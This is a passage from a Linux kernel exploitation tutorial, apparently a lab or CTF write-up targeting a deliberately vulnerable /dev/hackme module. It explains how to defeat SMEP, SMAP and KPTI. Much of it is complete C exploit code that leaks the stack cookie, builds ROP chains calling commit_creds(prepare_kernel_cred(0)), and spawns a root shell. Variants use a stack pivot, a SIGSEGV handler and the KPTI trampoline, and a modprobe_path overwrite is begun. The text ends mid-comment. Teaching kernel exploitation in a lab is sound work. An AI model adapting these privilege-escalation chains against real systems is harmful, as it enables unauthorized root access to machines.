[+] leaked cookie 0xaeab3cc4e3107a00 at offset 16
[    4.726632] unable to execute userspace code (SMEP?) (uid: 1000)
[    4.727729] BUG: unable to handle page fault for address: 00000000004019bf
[    4.728668] #PF: supervisor instruction fetch in kernel mode
[    4.729483] #PF: error_code(0x0011) - permissions violation
[    4.730694] PGD 6119067 P4D 6119067 PUD 6118067 PMD 6163067 PTE 7919025
[    4.732670] Oops: 0011 [#1] SMP NOPTI
[    4.733963] CPU: 0 PID: 113 Comm: no_mitigations Tainted: G           O      5.9.0-rc6+ #10
[    4.734799] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[    4.736732] RIP: 0010:0x4019bf
[    4.737208] Code: Bad RIP value.
...

The important part is [4.726632] unable to execute userspace code (SMEP?) (uid: 1000). Well, we are doing kernel exploitation. The error messages are not getting any clearer than this.

In kernel versions up to around 2019, it was possible to disable SMEP/SMAP by using the kernel function native_write_cr4(). As SMEP and SMAP are activated by setting bits 20 and 21 in the CR4 control register of the processor, it was possible to clear those bits and hence disable SMEP/SMAP. However, this was patched by pinning the bits so they cannot be changed anymore. Hence, this game plan does not work anymore.
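For illustration, the value that such an old-style exploit would have passed to native_write_cr4() can be computed as in the following sketch. The helper name is made up, and the code only performs the bit arithmetic. It does not touch CR4.

```c
#include <stdint.h>

/* Value to write to CR4 in order to switch off SMEP (bit 20) and
 * SMAP (bit 21) while leaving all other bits untouched. */
uint64_t cr4_without_smep_smap(uint64_t cr4) {
    return cr4 & ~((1ULL << 20) | (1ULL << 21));
}
```

For the CR4 value 0x3006f0 from the crash dumps above, this yields 0x6f0.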

Instead, we will craft a ROP chain using gadgets from the kernel only. This ROP chain will perform commit_creds(prepare_kernel_cred(0)), swapgs, and iretq. First, we create a list of all gadgets inside the kernel. Extract vmlinuz to vmlinux, as explained in the setup instructions above. There are multiple tools that can be used to extract ROP gadgets from vmlinux. ROPGadget (pip install ROPGadget) can be used with the command ROPgadget --binary vmlinux > gadgets.txt to find the gadgets. However, it does not seem to find gadgets containing iretq. There is also ropr (cargo install ropr), which is invoked using ropr --nouniq vmlinux > gadgets.txt. We can also filter gadgets using, e.g., ropr --nouniq -R '^iretq' vmlinux. Note that some of the gadgets that are found do not work, as they are in memory that is marked as non-executable.
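At their core, gadget finders search the code bytes for instruction sequences that end in a return. As a rough sketch of the idea, the following code looks for the two bytes 5f c3, which encode pop rdi; ret on x86-64. The function name is hypothetical, and real tools do considerably more, e.g., disassembling backwards from every ret.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Encoding of "pop rdi; ret" on x86-64. */
static const uint8_t POP_RDI_RET[] = {0x5f, 0xc3};

/* Find the next occurrence of the byte sequence pat in buf, starting at
 * offset start. Returns the offset, or -1 if there is no further match. */
long find_bytes(const uint8_t *buf, size_t len, size_t start,
                const uint8_t *pat, size_t pat_len) {
    if (pat_len == 0 || pat_len > len) {
        return -1;
    }
    for (size_t i = start; i + pat_len <= len; i++) {
        if (memcmp(buf + i, pat, pat_len) == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

To turn a match into a usable gadget address, the offset within the section has to be added to the virtual address at which that section is mapped.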

All that is left is creating a fake stack with the addresses of the gadgets and functions that we want to have executed. We then write to the device /dev/hackme and overwrite the real stack with our fake stack. When the stack is unwound, our gadgets and functions are executed one after the other.

Note that in the x64 calling convention, the arguments to functions are given in registers. The register RDI contains the first argument of a function. Hence, we write the value 0 in RDI and then call prepare_kernel_cred. The result is then returned in the register RAX, again according to the x64 calling convention.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; // iretq;

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to rbp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    payload[cookie_off++] = (uint64_t) 0; // this is popped to rbp

    payload[cookie_off++] = (uint64_t) iretq;  // restore registers from user mode
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Alternative way of bypassing SMEP but not SMAP

You may have noticed that we bypassed both SMEP and SMAP. By building the ROP chain only from kernel gadgets, we needed neither to execute nor to access memory pages from user mode. But there are alternative approaches that can bypass SMEP, but not SMAP, one of which I want to touch on here. The idea is to pivot the stack to a location where we can write our ROP chain. This is useful when we can overwrite only the return address but nothing beyond it.

There are a bunch of ROP gadgets that move a constant value into ESP. One such gadget is as follows.

uint64_t mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret

One could use this gadget as the return address when overflowing the buffer of the vulnerable device. Beforehand, one needs to write the remainder of the ROP chain to the address that is moved into ESP. As a write to ESP clears the upper half of RSP, this address lies in user space, and the region can be allocated using mmap.

The idea works if SMEP is enabled, as we do not need to execute anything in userland. However, it does not work when SMAP is enabled, as we need read and write access to the location where we pivot to, i.e., to a user land memory page.
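The address arithmetic behind the pivot can be sketched as follows. The struct and function names are hypothetical, and the extra page below the new stack pointer is an assumption about how much stack space the called kernel functions need.

```c
#include <stddef.h>
#include <stdint.h>

#define PIVOT_PAGE_SIZE 0x1000UL

struct pivot_layout {
    uint64_t map_base;   /* address to request from mmap */
    size_t   map_len;    /* length of the mapping in bytes */
    size_t   first_slot; /* index of the qword that RSP points to after the pivot */
};

/* Computes where to map the fake stack for a "mov esp, imm32" gadget. */
struct pivot_layout plan_pivot(uint32_t esp_imm) {
    struct pivot_layout p;
    /* Writing a 32-bit register zero-extends into the full 64-bit register. */
    uint64_t new_rsp = (uint64_t) esp_imm;
    /* Functions called from the chain push data below RSP, so map one page of headroom. */
    p.map_base = new_rsp - PIVOT_PAGE_SIZE;
    p.map_len = 2 * PIVOT_PAGE_SIZE;
    p.first_slot = PIVOT_PAGE_SIZE / sizeof(uint64_t);
    return p;
}
```

For the constant 0x5b000000 this gives a mapping at 0x5afff000 with a length of 0x2000 bytes, and the ROP chain starts at index 512 of the mapped array.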

I saw this idea in this other writeup.

We need to modify run.sh to disable SMAP and enable SMEP using the command line arguments -cpu kvm64,+smep.

The full code for the exploit is shown below.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; // iretq;

void build_fake_stack(void){
    uint64_t * fake_stack = mmap((void *)0x5b000000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    // need to subtract 0x1000, as prepare_kernel_cred and commit_creds also need space on the stack.
    unsigned off = 0x1000 / 8;
    fake_stack[0] = 0xdead; // put something in the first page to prevent fault
    fake_stack[off++] = 0x0; // popped to R12 due to gadget
    fake_stack[off++] = 0x0; // popped to RBP due to gadget
    // remainder of the ROP chain is as previously
    fake_stack[off++] = (uint64_t) pop_rdi_ret;
    fake_stack[off++] = (uint64_t) 0;
    fake_stack[off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    fake_stack[off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    fake_stack[off++] = (uint64_t) 0; // popped to rbp
    fake_stack[off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    fake_stack[off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    fake_stack[off++] = (uint64_t) 0; // this is popped to rbp

    fake_stack[off++] = (uint64_t) iretq;  // restore registers from user mode
    fake_stack[off++] = (uint64_t) user_rip;
    fake_stack[off++] = (uint64_t) user_cs;
    fake_stack[off++] = (uint64_t) user_rflags;
    fake_stack[off++] = (uint64_t) user_sp;
    fake_stack[off++] = (uint64_t) user_ss;
}

uint64_t mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) mov_esp_pop2_ret;  // stack pivot gadget

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    build_fake_stack();
    overflow_stack();
    return 0;
}

Adding KPTI

Next, we will add Kernel page-table isolation (KPTI).

For this we edit run.sh to include -append "console=ttyS0 kpti=1 nokaslr quiet panic=1".

KPTI is a mechanism that isolates the kernel page tables from user space. While in user mode, only the small part of the kernel that is needed to switch to kernel mode remains mapped.

Thus, if we execute the previous exploit, we get a segmentation fault instead of a kernel panic. This happens because our ROP chain returns to user mode without switching back to the user page tables. The process then runs in user mode on the kernel's set of page tables, in which the userland pages are marked as non-executable.

The following ASCII art illustrates the results of KPTI.

   Without KPTI                              With KPTI

+----------------+            +----------------+   +----------------+
|                |            |                |   |                |
|  Kernel pages  |            |  Kernel pages  |   |                |
|                |            |                |   +----------------+
|                |            |                |   |  Kernel pages  |
+----------------+            +----------------+   +----------------+
|                |            |                |   |                |
|                |            |                |   |                |
|                | ---------> |                |   |                |
|                |            |                |   |                |
|  User pages    |            |  User pages    |   |  User pages    |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
+----------------+            +----------------+   +----------------+

 User + Kernel                Kernel mode          User mode
 mode
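Before debugging an exploit, it helps to confirm that KPTI is really active in the VM. On x86, the flags line in /proc/cpuinfo should contain the word pti in that case. The following sketch checks a single line for a flag; the function name is my own, and reading the file line by line is left to the caller.

```c
#include <stdbool.h>
#include <string.h>

/* Returns true if flag appears as a whole whitespace-delimited word in line. */
bool has_cpu_flag(const char *line, const char *flag) {
    size_t flen = strlen(flag);
    if (flen == 0) {
        return false;
    }
    const char *p = line;
    while ((p = strstr(p, flag)) != NULL) {
        bool starts = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        char after = p[flen];
        bool ends = after == '\0' || after == ' ' || after == '\t' || after == '\n';
        if (starts && ends) {
            return true;
        }
        p += 1;  /* partial match, keep searching after this position */
    }
    return false;
}
```

Inside the VM, a quick grep pti /proc/cpuinfo serves the same purpose.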

I have read about three ways to bypass KPTI:

Using a signal handler: Here, a signal handler for the segmentation fault is registered that will execute the payload with root privileges.
KPTI Trampolines: The kernel needs to contain functionality for changing from kernel mode to user mode. This function, called a KPTI trampoline, is still mapped in memory even when we are in user mode, and hence can be used to return to user space without our hacky swapgs and iretq gadgets.
Abusing modprobe: The kernel stores the path of the modprobe binary in a variable. Under some circumstances, the binary at this path is executed. If the path is overwritten and these circumstances are brought about, the file at the new path is executed instead. This execution happens with root privileges.

KPTI Bypass 1: Using a Signal Handler

This is probably the easiest way to circumvent KPTI. Remember that if we execute the previous exploit, we get a segmentation fault. We can register a signal handler that handles the segmentation fault and executes the payload. The segmentation fault occurs after the elevation of privileges, when the switch back to user mode with iretq is performed. Hence, we only need to prevent the process from crashing. Instead of executing the payload, the registered function to handle the segmentation fault could simply do nothing.

Adding a signal handler can be performed by including the line signal(SIGSEGV, payload); within the main function. Further, we need to include the respective headers using #include <signal.h>.
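The mechanism can be tried in isolation, without the kernel module. In this sketch, raise(SIGSEGV) stands in for the fault that occurs after iretq, and the handler only sets a flag where the exploit would call payload(). All names are made up for the example.

```c
#include <signal.h>

static volatile sig_atomic_t handler_ran = 0;

/* Stand-in for payload(): only records that the handler was invoked. */
static void on_segv(int signo) {
    (void) signo;
    handler_ran = 1;
}

/* Installs the handler, sends SIGSEGV to the own process, and
 * returns 1 if the handler ran, 0 if not, -1 on error. */
int demo_sigsegv_handler(void) {
    if (signal(SIGSEGV, on_segv) == SIG_ERR) {
        return -1;
    }
    handler_ran = 0;
    raise(SIGSEGV);            /* simulated fault */
    signal(SIGSEGV, SIG_DFL);  /* restore the default behaviour */
    return handler_ran;
}
```

The process survives the signal because the handler takes over, which is all the bypass relies on.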

These are really the only changes that need to be made. But for the sake of completeness here is the full code.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; // iretq;

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to rbp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    payload[cookie_off++] = (uint64_t) 0; // this is popped to rbp

    payload[cookie_off++] = (uint64_t) iretq;  // restore registers from user mode
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    signal(SIGSEGV, payload);  // register the signal handler to bypass KPTI.
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

KPTI Bypass 2: KPTI Trampolines

This is the idea that you can find in most writeups on bypassing KPTI. When a syscall returns normally, some piece of kernel code has to perform the transition back to user mode. This code is called a KPTI trampoline. It switches from the kernel page tables to the user page tables and then executes swapgs and iretq, just like we did manually. In Linux, this function is called swapgs_restore_regs_and_return_to_usermode, and we can find its position by looking for it in the kallsyms. Note that we need root privileges to read the addresses.

# cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
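The same lookup can be done from C, which is handy when experimenting as root inside the VM. This is a sketch under the assumption that each line has the form "address type name"; the function names are hypothetical.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parses one kallsyms line. Returns 1 and stores the address
 * if the symbol name equals wanted, 0 otherwise. */
int kallsyms_match(const char *line, const char *wanted, uint64_t *addr) {
    uint64_t a;
    char type;
    char name[256];
    if (sscanf(line, "%" SCNx64 " %c %255s", &a, &type, name) != 3) {
        return 0;
    }
    if (strcmp(name, wanted) != 0) {
        return 0;
    }
    *addr = a;
    return 1;
}

/* Scans a kallsyms-style file for a symbol.
 * Returns 0 if the file is unreadable or the symbol is missing. */
uint64_t kallsyms_lookup(const char *path, const char *wanted) {
    FILE *f = fopen(path, "r");
    if (f == NULL) {
        return 0;
    }
    char line[512];
    uint64_t addr = 0;
    while (fgets(line, sizeof(line), f) != NULL) {
        if (kallsyms_match(line, wanted, &addr)) {
            break;
        }
    }
    fclose(f);
    return addr;
}
```

A call such as kallsyms_lookup("/proc/kallsyms", "commit_creds") returns the address of the symbol. Without sufficient privileges, the kernel typically reports all addresses as zero.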

Disassembling this function with radare2 can be done as shown below.

$ r2 -A vmlinux
...
[0xffffffff81e00000]> s 0xffffffff81200f10
[0xffffffff81200f10]> pdb
│           ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff8120137e(x)
│           ; DATA XREF from fcn.ffffffff8159fce0 @ 0xffffffff8159fced(x)
│           ; DATA XREF from fcn.ffffffff815a0180 @ 0xffffffff815a01ee(x)
│           0xffffffff81200f10      415f           pop r15
│           0xffffffff81200f12      415e           pop r14
│           0xffffffff81200f14      415d           pop r13
│           0xffffffff81200f16      415c           pop r12
│           0xffffffff81200f18      5d             pop rbp
│           0xffffffff81200f19      5b             pop rbx
│           0xffffffff81200f1a      415b           pop r11
│           0xffffffff81200f1c      415a           pop r10
│           0xffffffff81200f1e      4159           pop r9
│           0xffffffff81200f20      4158           pop r8
│           0xffffffff81200f22      58             pop rax
│           0xffffffff81200f23      59             pop rcx
│           0xffffffff81200f24      5a             pop rdx
│           0xffffffff81200f25      5e             pop rsi
│           0xffffffff81200f26      4889e7         mov rdi, rsp
│           0xffffffff81200f29      65488b2425..   mov rsp, qword gs:[0x6004]
│           0xffffffff81200f32      ff7730         push qword [rdi + 0x30]
│           0xffffffff81200f35      ff7728         push qword [rdi + 0x28]
│           0xffffffff81200f38      ff7720         push qword [rdi + 0x20]
│           0xffffffff81200f3b      ff7718         push qword [rdi + 0x18]
│           0xffffffff81200f3e      ff7710         push qword [rdi + 0x10]
│           0xffffffff81200f41      ff37           push qword [rdi]
│           0xffffffff81200f43      50             push rax
│       ┌─< 0xffffffff81200f44      eb43           jmp 0xffffffff81200f89
[0xffffffff81200f41]> s 0xffffffff81200f89
[0xffffffff81200f89]> pdb
│           ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff81200f44(x)
│           0xffffffff81200f89      58             pop rax
│           0xffffffff81200f8a      5f             pop rdi
│           0xffffffff81200f8b      ff15f7f0e300   call qword [0xffffffff82040088]  ; swapgs
│           0xffffffff81200f91      ff25e9f0e300   jmp qword [0xffffffff82040080]   ; iretq

The swapgs and iretq can be found behind the last call and jmp. This small stub is still mapped in memory even when we are in user mode, as it is necessary to enter and leave the kernel. As far as I understand, it cannot be unmapped because the switch of the page tables happens while this very code is running, so it has to be present in both sets of page tables. Hence, we can use it to bypass KPTI.

The plan is to jump to swapgs_restore_regs_and_return_to_usermode+22, as this skips the initial pop instructions and lands on mov rdi, rsp, right before the push operations begin. Note that at 0xffffffff81200f89 there are two additional pop instructions that we have to take care of.

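What is left is to replace the swapgs and iretq gadgets in our ROP chain with swapgs_restore_regs_and_return_to_usermode+22, followed by two dummy values. The trampoline expects these two slots in front of the iretq frame: the first one is restored into RDI, and the second one is skipped.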
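The tail of the chain can be written as a small helper, which makes the layout easier to see. The helper and the macro name are my own; the offset 22 is the one derived from the disassembly above.

```c
#include <stddef.h>
#include <stdint.h>

#define TRAMPOLINE_SKIP_POPS 22  /* offset of "mov rdi, rsp" within the function */

/* Appends the KPTI trampoline and the iretq frame to a ROP chain.
 * Returns the next free index in the chain. */
size_t append_trampoline(uint64_t *chain, size_t idx, uint64_t trampoline,
                         uint64_t rip, uint64_t cs, uint64_t rflags,
                         uint64_t sp, uint64_t ss) {
    chain[idx++] = trampoline + TRAMPOLINE_SKIP_POPS;
    chain[idx++] = 0;       /* first dummy slot consumed by the trampoline */
    chain[idx++] = 0;       /* second dummy slot consumed by the trampoline */
    chain[idx++] = rip;     /* the iretq frame starts here */
    chain[idx++] = cs;
    chain[idx++] = rflags;
    chain[idx++] = sp;
    chain[idx++] = ss;
    return idx;
}
```

With the address 0xffffffff81200f10 from kallsyms, the first entry becomes 0xffffffff81200f26.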

The full code is shown below.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;

uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10; // the offset from /proc/kallsyms


void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to rbp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // KPTI trampoline, +22 skips the pops
    payload[cookie_off++] = (uint64_t) 0; // dummy, restored into RDI by the trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy, skipped by the trampoline
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

KPTI Bypass 3: Abuse Modprobe

The binary modprobe is used to add or remove modules from the kernel. Its path is stored in a global kernel variable that can be accessed in /proc/sys/kernel/modprobe and usually defaults to /sbin/modprobe. Further, a reference to this variable called modprobe_path can be found in the kernel symbols accessible using /proc/kallsyms, as it is a kernel variable.

The game plan is to overwrite the path of modprobe with the name of a file containing custom commands. Overwriting modprobe_path can be performed using a ROP chain. The file containing the custom commands can be created any way you like. The final execution of the file referenced by modprobe_path, and hence of our commands, can be triggered by calling execve on a file whose binary format the kernel does not recognize.
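The trigger file is the only part of this plan that does not involve the kernel. A common choice, which I assume here, is a file consisting of four 0xff bytes, as no binary format handler accepts that header. The function name and any path passed to it are hypothetical.

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Creates an executable file whose header matches no known binary format.
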